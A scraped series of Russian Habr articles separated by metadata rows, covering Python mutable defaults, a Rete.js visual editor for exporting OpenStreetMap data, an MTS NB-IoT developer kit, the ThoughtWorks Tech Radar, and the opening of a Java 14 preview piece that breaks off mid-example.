Почему так происходит? Когда мы исполняем `l.append(x)`, меняется изменяемый объект, созданный при определении функции. Но переменная `l` всё ещё ссылается на старый адрес в памяти. Однако попытка изменить неизменяемую переменную во второй функции `y += x` приводит к тому, что y начинает ссылаться на другой адрес в памяти: исходная y будет забыта, что приведёт к ошибке UnboundLocalError.
### Заключение
Разница между изменяемыми и неизменяемыми объектами в Python очень важна. Избегайте странного поведения, описанного в этой статье. В особенности:
* Не используйте по умолчанию изменяемые аргументы.
* Не пытайтесь менять неизменяемые переменные-замыкания во внутренних функциях. | https://habr.com/ru/post/509274/ | null | ru | null |
# Экспортируем данные OpenStreetMap с помощью визуального редактора на rete.js
В своей работе я часто сталкиваюсь с задачей по экспорту данных из OpenStreetMap. OSM — это восхитительный источник данных, откуда можно вытащить хоть [достопримечательности](https://habr.com/ru/post/414433/), хоть [районы города](https://habr.com/ru/post/416899/), хоть улицы для [исследований пешеходной доступности](https://vk.com/@1567-road-crossing-distance), и вообще что угодно.
Вот только процесс работы с ними в какой-то момент начал меня утомлять. Чтобы вытащить данные по какому-то нетривиальному запросу, нужно или изучать язык запросов Overpass, или писать скрипты и ковыряться в OSM XML формате.
Проделывая эти манипуляции в сотый раз, я задумался о создании какого-нибудь более простого и удобного инструмента. И вот он готов — <https://yourmaps.io>, визуальный редактор описаний экспорта OpenStreetMap. В редакторе можно мышкой натыкать граф, каждый узел которого будет представлять операцию или фильтр над потоком OSM объектов, а затем скачать результат в GeoJSON.
Вот пример графа, который выбирает все школы в границах заданного муниципального округа, и затем строит 300-метровые буферы вокруг них:

В результате работы получим [вот такой набор полигонов](https://yourmaps.io/web-app/result/7UwMbvzxjVeKoFWR) в GeoJSON формате, которые затем можно импортировать в QGIS или еще какой-либо софт.
Под катом — немного про функционал сервиса, а также мой опыт работы с библиотекой Rete.js, которая позволяет легко вставлять визуальное программирование и редактирование графов в свой веб-проект.
### Rete.js
[Rete.js](https://rete.js.org) — JS библиотека для рисования и редактирования графов, с упором именно на визуальное программирование и создание схем обработки данных. К сожалению, документация там не отличается полнотой и до некоторых вещей мне пришлось додумываться самостоятельно.
В этом разделе я приведу примеры кода, как на Rete сделать графы со сложными узлами с различными видами пользовательских контролов. Если вам интересно только про экспорт из OpenStreetMap — сразу переходите к следующему разделу.

Граф состоит из узлов (node), которые создаются на основе компонент (component). При этом у каждого узла есть входы, выходы и контролы (элементы пользовательского ввода). Также к каждому узлу привязано поле data, хранящее его состояние (например, данные, введенные пользователем)
В документации по Rete есть [простой пример](https://rete.js.org/#/examples/basic) с полем для ввода чисел. Однако мне быстро потребовались и более сложные варианты: например, селекты для выбора режима работы узла или кнопка для добавления новых полей ввода (чтобы можно было менять количество значений в фильтрах) или входов узла.
Мне пришлось самому додумываться до того, как сделать такие сложные элементы, так что на всякий случай приведу тут код того, что у меня получилось, если вдруг кому-то придется решать схожую задачу.
Код ниже — для компонента фильтра по значению тега, позволяющего добавлять новые значения по нажатию на кнопку, и имеющего селект для выбора режима сравнения (совпадение или несовпадение значения тега). Сразу скажу, что веб-программирование это не мой конек, кто-то может меня тут побить ногами за использование jquery в 2к20, но по другому я не умею. Да и полезен тут принцип работы с контролами рете, а не нюансы джаваскрипта.

Код InputControl взят из примера Rete, это просто текстовое поле ввода.
**Код контрола со списком**
```
var SelectComponent = {
// Шаблон - это HTML элементы, которые будут добавляться к нашему узлу графа, и на которые можно ссылаться как на this.root дальше по коду
template: '',
data() {
return {
value: ""
};
},
methods: {
update() {
// сохраняем данные о состоянии в наш узел графа
this.putData(this.ikey, $(this.root).val())
}
},
// метод вызовется при привязке компонента к реальному узлу графа
mounted() {
// this.root - это html элемент, созданный по нашему template, т.е. select в данном случае
let jqueryRoot = $(this.root)
// накидаем в селект нужных значений
for (let idx = 0; idx < this.values.length; ++idx) {
let v = this.values[idx]
jqueryRoot.append($("")
.attr("value", v[0])
.text(v[1]));
}
// если мы загружаем уже готовый граф - в данных нашего узла уже будет выбранное значение, восстановим его
let currentVal = this.getData(this.ikey)
if (currentVal === undefined) {
currentVal = this.defaultValue
this.putData(this.ikey, this.defaultValue)
}
jqueryRoot.val(currentVal);
const _self = this;
// на каждое изменение значения селекта будем сохранять его в data
jqueryRoot.change(function() {
_self.root.update()
})
}
}
// Дальше этот контрол можно добавлять к узлу графа как node.addControl(new SelectControl(...))
class SelectControl extends Rete.Control {
constructor(emitter, key, values, defaultValue) {
super(key);
this.key = key;
this.component = SelectComponent
// к этим полям можно получить доступ из кода компоненты контрола, в них можно хранить данные конкретного инстанса
this.props = { emitter, ikey: key, values: values, defaultValue: defaultValue};
}
}
```
**Код контрола, добавляющего новые поля ввода в узел графа**
```
var AddTextFieldComponent = {
// наш шаблон - это кнопка, по нажатию на которую будем добавлять новый InputControl
template: '' +
' Add Value',
data() {
return {
value: ""
};
},
methods: {
// метод для подсчета того, сколько контролов уже есть, считаем InputControlы, у которых id начинается с заданного префикса
getCount(node, prefix) {
let count = 0;
node.controls.forEach((value, key, map) => {
if (key.startsWith(prefix) && value instanceof InputControl) {
++count;
}
});
return count;
},
// по клику на кнопку добавляем новый контрол с именем, состоящем из префикса и индекса
update(e) {
let count = this.methods.getCount(this.node, this.prefix)
this.node.addControl(new InputControl(this.editor, this.prefix + count))
// следующие два метода надо пнуть, чтобы заставить Rete перерисовать узел графа с новым контролом
this.node.update()
this.emitter.view.updateConnections(this)
// дополнительно сохраняем в данные узла графа общее количество контролов, чтобы при загрузке графа из json было ясно, сколько надо полей ввода создать
this.putData(this.iKey, count + 1)
}
},
mounted() {
const _self = this;
this.root.onclick = function(event) {
_self.root.update()
}
}
};
class AddTextFieldControl extends Rete.Control {
constructor(emitter, key, prefix, node, inputPlaceholder) {
super(key);
this.key = key;
this.component = AddTextFieldComponent
this.props = { emitter, iKey: key, prefix: prefix, node: node, inputPlaceholder: inputPlaceholder};
}
}
```
**Код компонента узла графа**
```
class FilterByTagValueComponent extends Rete.Component {
constructor(){
super("Filter_by_Tag_Value");
}
builder(node) {
// наш узел фильтрации принимает и выдает потоки объектов карты, для этого у меня заведен тип osm.
// Механизм сокетов позволяет в Rete ограничивать то, какие входы и выходы можно соединять друг с другом
var input = new Rete.Input('osm',"Map Data", osmSocket);
var output = new Rete.Output('osm', "Filtered Map Data", osmSocket);
// контрол для ввода названия тега
var tagNameInput = new InputControl(this.editor, 'tag_name')
// контрол с выбором режима сравнения значения тега
var modeControl = new SelectControl(this.editor,
"mode",
[["EQUAL", "=="], ["NOT_EQUAL", "!="], ["GREATER", ">"], ["LESS", "<"], ["GE", ">="], ["LE", ">="]],
"EQUAL")
// добавляем наши инпуты
node.addInput(input)
.addControl(tagNameInput)
.addControl(modeControl)
.addControl(new AddTextFieldControl(this.editor, "tag_valueCount", "tag_value", node, "Tag Value"))
// Если мы восстанавливаем узел графа из json - надо прочитать, сколько инпутов в нем было, и добавить нужное количество
// Значение data.tag_valueCount записывает AddTextFieldControl, описанный выше
let valuesCount = 1;
if (node.data.tag_valueCount !== undefined) {
valuesCount = node.data.tag_valueCount
}
// Добавляем нужное количество InputControlов
node.addControl(new InputControl(this.editor, 'tag_value'))
for (let i = 1; i < valuesCount; ++i) {
node.addControl(new InputControl(this.editor, 'tag_value' + i))
}
return node
.addOutput(output);
}
}
```
В итоге мне понадобились дополнительные контролы для:
* Селектов
* Добавления полей ввода
* Добавления входов узла
* Выбора области на карте (для этого в моем контроле по нажатию кнопки открывался поп-ап с картой, нарисованной на leaflet.js и [плагином](https://github.com/kajic/leaflet-locationfilter/) по выбору области). А, еще я использовал [апи статических карт Here Maps](https://developer.here.com/documentation/map-image/dev_guide/topics/what-is.html) для отображения превью карты

С их помощью можно сделать узлы графа для решения всех типичных задач обработки данных карт.
После нажатия пользователем кнопки запуска, граф сериализуется в JSON (в Rete уже есть сохранение и загрузка графов), отправляется на сервер, там парсится и обрабатывается.
### Примеры экспорта OSM данных
В этом разделе я приведу несколько примеров того, как можно использовать нарисованный граф для решения задач экспорта картографических данных.
Начнем с простого: выберем все парки (объекты с тегом leisure=park, все популярные значения тегов можно найти на [вики OSM](https://wiki.openstreetmap.org/wiki/Tag:leisure=park)):

В графе у нас слева — узел, скачивающий OSM данные для указанного района, затем узел, фильтрующий по наличию тега и наконец узел с результатом. Первый узел создает поток картографических объектов (кто хоть немного разбирается с функциональным программированиям и всякими стримами (в терминах Java) — тот легко поймет как оно работает), второй его фильтрует, а третий сохраняет результат, который потом можно скачать или [просмотреть](https://yourmaps.io/web-app/result/SKVFeFZ2jsKhMuUJ).
**Результат**
Полученные объекты выделены синим, можно просмотреть их значения тегов:

Пример посложнее: хотим построить 500-метровые круглые зоны доступности вокруг школ:

Тут мы сперва получаем поток объектов для области, затем фильтруем его по тегу amenity=school, затем для каждой школы от ее геометрии переходим к центроиду (точка — центр масс), затем вокруг центроида строим буфер нужной толщины.
Можно было бы строить буфер сразу вокруг школы, но тогда его форма зависела бы от формы здания школы. А буфер вокруг точки-центроида всегда будет круглым.
Что делать, если мы хотим получить не только буфера, но и сами здания школ? Все просто: разделяем поток после фильтра по тегу на два (оба потока будут копиями друг друга и будут содержать те же значения), один обрабатываем буфером, другой оставляем как есть, затем объединяем их с помощью узла Union. Этот узел просто сливает все входные потоки в один выходной:

Получаем результат… упс. Некоторые школы показаны полигонами-зданиями, а некоторые — маркерами, т.е. точками. Оказывается, некоторые объекты с amenity=school это не здания школ, а точки, находящиеся внутри полигонов зданий. Так обычно мапят тогда, когда объект не занимает все здание целиком.

В зависимости от того, что нам нужно, мы можем либо отбросить такие точечные объекты вообще с помощью узла-фильтра по геометрии. Или можем немного извратиться вот так:

Это довольно сложный пример с переносом тегов с точечных объектов на здания. Похожий пример я подробно описал [в документации по нашему проекту](https://docs.yourmaps.io/blog/complicated-example-clinics/). Вкратце — мы оставляем только те здания из ветки 4, которые пересекаются хотя бы с одной школой из ветки 3. Потом сливаем их в один поток вместе с этими школами. И затем объединяем в этом потоке пересекающиеся
объекты в один. Т.е. мы объединим точки-школы и полигоны-здания, в которые они попадают.
В результате получаем полигоны зданий и зон доступности вокруг них:

### Заключение
Вот так с помощью простого визуального редактора на Rete.js наш сервис [YourMaps](https://yourmaps.io) позволяет просто выполнять достаточно сложные задачи экспорта и преобразования картографических объектов.
В дальнейшем я планирую туда добавить еще больше всего — например, возможность загружать данные не только из OSM, но и из своих GeoJSON файлов, больше типов операций и фильтров и т.п.
Мне лично этот сервис уже неплохо помогает. Например, когда надо студенту что-то быстро показать на OSM карте — мне не надо больше запускать QGIS и вспоминать сложный язык запросов Overpass, я в пару движений мышкой накликиваю нужный граф, за несколько секунд он обрабатывается и можно сразу там же увидеть результат.
Надеюсь, он окажется полезным и кому-то из вас. Как всегда, готов выслушать предложения и пожелания или тут в комментариях, или можете прислать на почту evsmirnov@itmo.ru | https://habr.com/ru/post/502714/ | null | ru | null |
# Техрадар от ThoughtWorks
Добрый день, меня зовут Павел Поляков, я Principal Engineer в каршеринг компании SHARE NOW, в Гамбурге в 🇩🇪 Германии. А еще я автор Telegram-канала [Хороший разработчик знает](https://t.me/gooddevknows), где рассказываю обо всем, что должен знать хороший разработчик.
Сегодня я хочу поговорить Technology Radar от ThoughtWorks, как он помогает при выборе технологий и какие новости нам принес недавний выпуск.
### Что за Technology Radar?
Большая консалтинговая компания ThoughtWorks регулярно, примерно раз в полгода, выпускает документ, где субъективно рассказывает о положении на рынке технологий. Эта информация, помимо текста, отображается в виде радара.
Техрадар #25На радаре четыре секции (описания условны):
1. **📋 Techniques**. Техники, которые могут использоваться при разработке. Например, [Four Key Metrics](https://habr.com/ru/post/583268/), я писал об этом на Хабре.
2. ⚙️ **Tools**. Инструменты, которые используются при разработке. Например, JavaScript сборщик [Vite](https://vitejs.dev/).
3. **🏢 Platforms**. Инфраструктурные компоненты или сервисы. Например, портал для разработчиков [Backstage](https://backstage.io/).
4. **🔠 Language & Frameworks**. Все про уровень языков программирования и вытекающих из них особенностей. Например, [React Hooks](https://reactjs.org/docs/hooks-intro.html).
В каждой секции вещи, о которых говориться, расположены в четырех категориях:
1. **Hold**. Придержать использование или наоборот, пора отказываться от этой технологии.
2. **Assess**. Стоит понаблюдать за технологией.
3. **Trial**. Стоит пощупать руками и сделать выводы.
4. **Adopt**. Можно смело внедрять.
Таким образом, изучая Техрадар, можно быстро узнать, что нового, о чем стоит знать, появилось, а что старое уже отживает свое. Например, если `React Hooks` находится в *Adopt*, то в новом проекте на `React` точно не нужно использовать классы и `lifecycle` методы.
### Что интересного?
Буквально на днях вышел свежий [Техрадар #25](https://www.thoughtworks.com/en-de/radar). Ниже короткий обзор того, что мне показалось интересным.
#### 📋 Techniques
**Adopt** [**Zero Trust Architecture**](https://en.wikipedia.org/wiki/Zero_trust_security_model)
Эта парадигма подразумевает, что при проектировании систем мы перестаем доверять пользователям, только потому, что они находятся внутри защищенного периметра. Т.е. внутри сети. У таких пользователей не должно быть больше прав. Внедрение идеи требует реализации `* as code` — инфраструктура как код, безопасность как код, все как код.
**Trial** [**Remove mob programming**](https://www.remotemobprogramming.org/)
Мы уже долго работаем удаленно, но работать удаленно нужно все равно вместе, так достигается лучший результат. Наверное каждый представляет себе парное программирование и как его реализовать удаленно. В *remote mob programming* идея идет дальше — теперь на звонке не два человека, а небольшая группа. Один человек шарит экран и набирает код, другие обсуждают и решают что набирать. Каждая сессия направлена на решение одной проблемы.
**Trial** [**CBOR**](http://cbor.io/)
`CBOR` это бинарная альтернатива `JSON`, я узнал об этом формате из этого Техрадара, хотя он существует уже давно. Зачем передавать больше информации (`JSON` = текст), если можно передавать меньше (`CBOR` = бинарные данные)? Подходит для коммуникации сервисов между собой.
#### ⚙️ Tools
**Assess** [**Vite**](https://vitejs.dev/)
`JavaScript` сборщик от создателя `Vue` уверенно закрепляется на рынке, вытесняя `Webpack` и тех, кто до этого вытеснял `Webpack`. Большое преимущество — скорость, в частности скорость `Hot Module Replacement`.
**Trial** [**Lens**](https://k8slens.dev/)
Kubernetes стал стандартом для облачного хостинга. Lens позволяет добавить UI в работу с k8s кластерами. С помощью этой `IDE` для `Kubernetes`, как они сами себя называют, вы сможете управлять кластерами визуально. Это демократизирует использование k8s.
#### 🏢 Platforms
**Trial** [**Backstage**](https://backstage.io/)
Backstage это платформа для построения порталов для разработчиков. Само понятие "портал для разработчиков" тоже новое, что это значит? В больших компаниях сотни сервисов, `API` спецификаций, море документации. В этой информации сложно ориентироваться. Можно попытаться решить эту проблему с помощью порталов для разработчиков — это вебсайт, который должен стать домашней страницей для разработчиков. Один из ключевых модулей это каталог сервисов — с помощью `yaml` аннотаций, похожих на `k8s` аннотации, можно описать сервисы и их `API`. Это упрощает взаимодействие между командами — всем понятно где что искать. Backstage находится в активной разработке, но его уже можно внедрять.
**Trial** [**Vercel**](https://vercel.com/)
Речь о бышей платформе `now.sh`. Альтернативная облачная платформа с лозунгом "Develop. Preview. Ship" набирает ход. Большой фокус на development experience, что достаточно важно для инди разработчиков и небольших компаний. Хорошо подходит для [Jamstack](https://jamstack.org/) решений. Но AWS и другие облачные платформы тоже стараются облегчить использование своих технологий, например [AWS App Runner](https://aws.amazon.com/apprunner/).
#### 🔠 Language & Frameworks
**Trial** [**Quarkus**](https://quarkus.io/)
Если вы пишете на `Java/Kotlin`, то, наверное, знаете о Quarkus — восходящей альтернативе Spring. `Quarkus` решения готовы к работе в облаке (`Kubernetes-native`) и их можно запускать на `GraalVM` (скорость запуска 📈). Уверен, что Spring еще долго будет номер один, в основном, потому что есть куча специалистов которые умеют с ним работать. Но здорово, что альтернативные решения набирают вес.
**Trial** [**Gatsby.js**](https://www.gatsbyjs.com/)
`Gatsby.js` позволяет вам разрабатывать сайты используя `React` (почти), а потом генерировать из вашего кода статический сайт. В результате эти сайты лучше масштабируются, ведь им не нужен сложный сервер. Еще Gatsby плотно использует `GraphQL`, что позволяет ему использовать разные источники информации при генерировании сайта.
### Завершаем
Чтобы эффективно решать задачи, мы должны интересоваться новыми технологиями и практиками. С помощью новых технологий можно решать старые задачи более эффективно. Еще лучше, продолжать держать руку на пульсе современных технологий. Потому что современные технологии рано или поздно станут устаревшими и от них нужно вовремя отказаться. Техрадар от ThoughtWorks помогает ответить на этот вопрос.
Что интересного вы нашли в выпуске этого Техрадара? На что вы ориентируетесь при выборе технологий? Пишите в комментариях.
#### А еще...
В конце еще раз приглашу вас в свой Telegram-канал. На канале [Хороший разработчик знает](https://t.me/gooddevknows) я минимум три раза в неделю простым языком рассказываю про свой опыт, хард скиллы и софт скиллы. Я 15+ лет в IT, мне есть чем поделиться. Все это нужно разработчику, чтобы делать свою работу хорошо, быть востребованным на рынке и получать высокую компенсацию.
Спасибо 🤗 | https://habr.com/ru/post/587184/ | null | ru | null |
# Из чего состоит набор для разработчиков NB-IoT DevKit?
Набор вышел в начале июня. Он поможет разобраться, в чем преимущества сети интернета вещей NB-IoT, и научит работать с ней. В комплект входит аппаратная часть, коннективити, то есть доступ к сети NB-IoT и доступ к IoT-платформам. Главная «фича» DevKit – демонстрационная прошивка, которая позволяет на практике разобраться, как работает система. В этой статье детально рассмотрим DevKit и его возможности.

### Кому это надо?
Когда мы начали разворачивать сеть NB-IoT (почитать больше о сети NB-IoT можно [здесь](https://habr.com/ru/company/ru_mts/blog/430496/)), на нас со всех сторон посыпались различные вопросы. Крупные производители, которые много лет работают на рынке M2M устройств, стартапы, начинающие разработчики и просто любители интересовались режимами работы сети, протоколами передачи данных, даже управлением радиомодулем АТ-командами. Нас спрашивали, какие частоты (band) используются, как работает режим power save mode, как устройство и сеть согласуют соответствующие таймеры, как, используя протокол транспортного уровня UDP, добиться гарантированной доставки сообщения, как задать APN и выбрать определенный band (частотный диапазон). И множество других вопросов.
В ходе тестов мы также обратили внимание, что многие устройства не адаптированы для работы в сети NB-IoT и в результате работают некорректно. Например, использование протокола передачи данных с транспортным уровнем TCP приводит к высокому объему передаваемого трафика, а также к трудностям при работе в сложных радиоусловиях. Другая распространенная проблема – использование радиомодуля в режиме по умолчанию, в котором модуль сам включает eDRX: это вводит пользователя в заблуждение, так как он не может принять данные в произвольный момент времени.
К нам стали обращаться ВУЗы, специализирующиеся на телекоммуникациях, которым интересно изучить на реальных устройствах технологии LPWAN, в том числе NB-IoT, и разработчики-любители, которые хотят поэксперементировать и создать собственное IoT-решение для умного дома или даже умного города.
Мы решили, что лучший способ ответить на все эти вопросы – создать development kit, на котором можно будет максимально быстро научиться работать с сетью интернета вещей.
### Из чего состоит набор?
Мы сделали решение, с которым можно сразу начинать работать, ничего не приобретая дополнительно. Как уже говорилось выше, в комплект входит аппаратная часть, коннективити, то есть доступ к сети NB-IoT, и доступ к IoT-платформам.
В состав аппаратной части входит радиомодуль Ublox SARA-R410, микроконтроллер STM32L152RE, кабели, антенны и программатор. На основной плате установлены акселерометр и температурный датчик. Плата расширения в форм-факторе Arduino-shield содержит GNSS модуль.
Модуль идентификации в сети входит в базовый набор и выполнен в виде SIM-чипа NB-IoT с безлимитным трафиком на год. Пользователю не нужно тратить время на подключение SIM-карты и выбирать тариф, кроме того, SIM-чип обеспечивает большую надежность: он не подвержен перепадам температур, влажности и вибрациям. Также вместе с комплектом пользователь получает готовую учетную запись на платформе IoT с настроенными виджетами и возможностью гибко настраивать виджеты самостоятельно – дополнительно получать и оплачивать аккаунт не потребуется.
Также по запросу возможна активация функционала NIDD и возможность работы через узел SCEF (Service Capability Exposure Function) сети NB-IoT МТС. Сервис снимает с разработчика необходимость идентификации и аутентификации устройств и предоставляет возможность клиентским серверам приложений (Application Server) получать данные и управлять устройствами через единый API-интерфейс. В России ни один другой оператор интернета вещей не предоставляет такую возможность.
### Возможности демонстрационной прошивки
Демонстрационная прошивка содержит функциональное меню, которое позволяет новичкам сразу приступить к работе. Достаточно лишь подключить плату и получить регистрационные данные. Прошивка реализует функциональное меню, доступ к которому мы получаем, подключившись через любую терминальную программу. Можно воспользоваться знакомой многим PuTTY. Мы также рекомендуем удобную и бесплатную утилиту от Ublox: m-center

Выглядит меню так:
```
*** Welcome to MTS NB-IoT Development Kit service menu ***
Firmware version: 2.3 beta 2, 28.05.2020
Current settings found in EEPROM:
Target IP: 195.34.49.22
Target port: 6683
Target URL: /api/v1/devkitNIDDtest03/telemetry
NIDD APN: devkit.nidd
Use NIDD for telemetry: 1
Board mode on startup: service menu
Telemetry interval
(in logger mode): 1000 ms
GNSS privacy mode: 0
```
Type in a function number from a list below and press enter.
```
Target server setup:
1 - set the URL of the resource JSON data will be transmitted to
2 - set the IP address
3 - set the port
4 - set an APN for NIDD access or turn NIDD mode ON or OFF
System functions:
5 - force send telemetry packet
6 - wait for incoming NIDD data during specified timeout
7 - enter direct AT-command mode
8 - enter true direct mode to access the RF module
CAUTION: to exit this mode you will have to reboot the board physically
9 - show ICCID, IMEI, IMSI and MCU serial number
10 - show network information
11 - set telemetry transmission interval
12 - set GNSS privacy mode
(hide actual location data when transmitting on server)
13 - set firmware startup mode (setup or logger)
14 - read on-board sensors and try to acquire GNSS data
15 - reboot MCU
16 - reboot RF module
17 - factory setup & test
(do not use this unless you really know what you want)
```
Первые четыре пункта меню позволяют настроить параметры соединения с платформой (URI-path, IP, порт, параметры NIDD). Пятый пункт позволяет отправить пакет, содержащий данные с датчиков на плате.
Пример того, как выглядит результат отправки пакета по протоколу CoAP:
```
Using IP method.
Sending data to iotsandbox.mts.ru:6683/api/v1/devkitNIDDtest03/telemetry
Telemetry:
{'interface':'telemetry', 'ICCID':'89701012417915117807', 'Tamb_degC':24, 'aX':-14, 'aY':23, 'aZ':244, 'RSSI_dBm':-81, 'latitude':55.768848, 'longitude':37.715088, 'GNSS_data_valid':1}
(184 bytes)
Raw CoAP data (225 bytes):
5102000000B36170690276310D036465766B69744E4944447465737430330974656C656D65747279FF7B27696E74657266616365273A2774656C656D65747279272C20274943434944273A273839373031303132343137393135313137383037272C202754616D625F64656743273A32342C20276158273A2D31342C20276159273A32332C2027615A273A3234342C2027525353495F64426D273A2D38312C20276C61746974756465273A35352E3736383834382C20276C6F6E676974756465273A33372E3731353038382C2027474E53535F646174615F76616C6964273A317D
Server response code: 2.03, response time = 664 ms.
Server response dump:
5143067000
```
Переданные данные мы видим на платформе:

Пункт меню 14 позволяет считать данные с датчиков на основной плате и на плате расширения, вот пример того, что мы увидим:
```
On-board sensors data:
temperature: 23
accelerometer: X = -3 Y = 4 Z = 249
Accelerometer signature value is correct.
Testing GNSS option...
GNSS string:
$GNGLL,5546.12120,N,03742.89412,E,133220.00,A,D*75
Parsed data:
latitude = 55.768687
longitude = 37.714902
```
Можно прочитать идентификаторы радиомодуля и микроконтроллера, используя пункт 7 меню. В таком случае ответ будет:
```
Board identification data
SIM card ICCID: 89701012417915117807
AT+CCID
+CCID: 89701012417915117807
OK
RF module IMEI: 359215103260015
AT+CGSN
359215103260015
OK
IMSI:
AT+CIMI
250011791511780
OK
MCU serial number:
0x393533307473832200
```
Используя пункт 10 меню можно считать сетевые параметры NB-IoT, вот пример вывода:
```
RSSI = -75 dBm (valid range is -111 to -51 dBm)
SNR = 22 dB
RSRP = -83 dBm (valid range is -141 to -44 dBm)
Cell ID = 753621
EARFCN = 1711
```
Также можно перейти в режим прямого управления радиомодулем посредством АТ-команд, используя пункт меню 8. Эта функция переводит Development kit в режим отладочной платы радиомодуля. Ниже пример прямого управления радиомодулем с командами обмена данными между устройством и сервером в режиме NIDD:
```
Entering true direct mode.
From now on everything you type into a terminal will be transferred to the RF module as is
(and similarly in reverse direction).
NOTICE: No special commands supported here, for nothing is between you and the RF module.
YOU NEED TO REBOOT THE BOARD PHYSICALLY TO EXIT THIS MODE.
---
at+cereg?
+CEREG: 0,1
OK
AT+COPS?
+COPS: 0,0,"MTS RUS MTS RUS",9
OK
at+cgdcont?
+CGDCONT: 1,"NONIP","devkit.nidd","0.0.0.0",0,0,0,0
OK
AT+CRTDCP=1
OK
AT+CSODCP=1,16,"{'test':'hello'}"
OK
+CRTDCP:1,5,"Hi hi"
```
Меню демонстрационной прошивки позволяет также включить режим постоянной отправки данных с датчиков с заданной периодичностью, реализует обратный канал передачи данных и другие функции.
Для «продвинутых» пользователей открыты исходные коды прошивки, можно оценить логику работы устройства на уровне кода, внести изменения и экспериментировать. Со стороны облачной платформы доступны инструменты для обработки данных: виджеты, панели управления, инструменты «Интеграции», позволяющие принять данные в любом формате в протоколах UDP, TCP и Non-IP. Инструмент «Конвертер данных» позволяют привести получаемый поток данных к виду понятному платформе.
### DevKit и Ардуино
Несмотря на критическое отношение части профессионалов к Ардуино, которые указывают на неоптимальный код и на то, что библиотеки написаны не профессиональными разработчиками, мы изначально хотели сделать DevKit совместимым с Ардуино. Arduino IDE пользуется популярностью среди разработчиков–любителей, а также может применяться в учебных программах ВУЗами.
DevKit полностью совместим с Ардуино R3 по своему духу, архитектуре, и разьемам. Для устройства были разработаны все сопутствующие файлы поддержки, так что оно устанавливается в Arduino IDE штатным образом.

В состав пакета для Arduino IDE включены необходимые инструменты и библиотеки, а также ряд примеров с исходными текстами. Программная совместимость с другими платами Arduino на основе STM32 позволяет использовать написанные для них библиотеки, а также загружать рабочие скетчи практически без изменений. Для программирования DevKit из Arduino IDE необходимо установить ПО STMCubeProgrammer, которое можно скачать с сайта компании STM. Наши разработчики продолжают наполнять пакет для Arduino новыми библиотеками и примерами.
В качестве простейшего примера работы с Arduino IDE рассмотрим загрузку примера Blink (мигание светодиодом). На изображении ниже можно увидеть результат загрузки и компиляции данного скетча из меню Файл – Примеры – 01.Basics


### Поддерживаемые интегрированные среды разработки
Разработка демонстрационной прошивки производилась в интегрированной среде Em::Bitz. Программный код примера рассчитан на компиляцию с помощью GCC. Для разработки пользовательского кода пригодны любые IDE, поддерживающие семейство микроконтроллеров STM32L15x. Например, Arduino IDE, IAR Embedded Workbench, Keil uVision MDK ARM и другие.
### Расширение функциональности
Функциональность можно расширять как с помощью шилдов, так и подключая любые дискретные датчики.

Установка GNSS-шилда превращает DevKit в GPS/GLONASS трекер.

Добавляем еще один шилд и получаем дополнительную возможность записи данных на карточку памяти и часы реального времени.

Можно подключить специальный шилд и добавить функциональность Ethernet и карту памяти.

Подключая датчики скорости и направления ветра получаем NB-IoT метеостанцию

Подключаем ультразвуковой датчик и реле управления насосом – получаем автомат контроля уровня жидкости в емкости.

В следующем материале покажем на практике, как собрать на основе NB-IoT DevKit устройство интернета вещей. Заказать NB-IoT Development Kit можно уже сейчас на нашем сайте.
*Авторы:
старший менеджер группы планирования сети IoT Виталий Бачук
ведущий эксперт направления МТС Виктор Лучанский
руководитель группы планирования сети IoT Андрей Плавич* | https://habr.com/ru/post/508198/ | null | ru | null |
# Чего ждать от Java в 2020 году?
2020 уже в разгаре, давайте же обсудим, какие изменения в мире Java нас ожидают в этом году. В этой статье перечислю основные тренды Java и JDK. И буду рад дополнениям от читателей в комментариях.
Сразу оговорюсь, что статья носит скорее ознакомительный характер. Детали по каждой рассмотренной теме можно найти на сайте соответствующего проекта или в публикациях в открытых источниках.

Итак, начнем. К сожалению, сразу придется разочаровать тех, кто не слишком следит за циклом Java-релизов, но ждет длинную программу поддержки (LTS). В этом году нас ждут релизы только с коротким жизненным циклом поддержки (STS).
Первым мы рассмотрим грядущий релиз JDK 14, который должен выйти уже в середине марта. В этом релизном цикле заявлено целых 16 JEP-ов. Вот полный список:
| | |
| --- | --- |
| 305: | Pattern Matching for instanceof (Preview) |
| 343: | Packaging Tool (Incubator) |
| 345: | NUMA-Aware Memory Allocation for G1 |
| 349: | JFR Event Streaming |
| 352: | Non-Volatile Mapped Byte Buffers |
| 358: | Helpful NullPointerExceptions |
| 359: | Records (Preview) |
| 361: | Switch Expressions (Standard) |
| 362: | Deprecate the Solaris and SPARC Ports |
| 363: | Remove the Concurrent Mark Sweep (CMS) Garbage Collector |
| 364: | ZGC on macOS |
| 365: | ZGC on Windows |
| 366: | Deprecate the ParallelScavenge + SerialOld GC Combination |
| 367: | Remove the Pack200 Tools and API |
| 368: | Text Blocks (Second Preview) |
| 370: | Foreign-Memory Access API (Incubator) |
Многие JEP-ы из этого списка широко освещались на конференции Joker 2019. Остановлюсь на тех, которые представляются мне наиболее интересными.
### Pattern Matching for instanceof (Preview)
Долгий JEP наконец-то выходит в Preview. Думаю, если вы практикующий программист, который промышленно пишет код на Java много лет, то не раз сталкивались с этой болью:
```
if (obj instanceof String) {
String s = (String) obj;
System.out.println(s.toUpperCase());
}
```
Если же вы писали или пишете код еще и на Kotlin, то боль от увиденного кода на Java немного усиливается. Участники проекта Amber представят нам своё видение Pattern Matching в Java, которое должно уменьшить эту боль. С приходом Java 14 мы сможем переписать пример следующим образом:
```
if (obj instanceof String s) {
System.out.println(s.toUpperCase());
}
```
Кажется, что дополнение не такое уж и ценное – экономим строчку кода. Но представим, что мы хотим сделать следующее:
```
if (obj instanceof String) {
String s = (String) obj;
if (s.contains(“prefix_”)) {
return s.toUpperCase();
}
}
return null;
```
Громоздко выглядит, не так ли? Попробуем тоже самое, но с Pattern Matching.
```
return (obj instanceof String s) && s.contains(“prefix_”) ? s.toUpperCase() : null;
```
Так явно будет лучше. Но помним, что статус у этой функциональности – Preview. Посмотрим, что изменится со временем. Что касается меня, это точно сделает мою жизнь лучше.
### Helpful NullPointerExceptions
На дворе 2020 год, а вы еще пишете так, что у вас вылетают NullPointerExceptions? Не переживайте, вероятно, вы не единственный. Goetz Lindenmaier и Ralf Schmelter не предложили новый способ уйти от NullPointerExceptions (Optional все еще с нами), но предложили улучшить процесс отладки приложения, чтобы понять, где же именно лежит null. Итак, представим, что мы пишем код в пятом часу… ночи, конечно же. И написали мы вот такую функцию:
```
public String getStreetFromRequest(Request request) {
return request.getAddress().getStreet().toUpperCase();
}
```
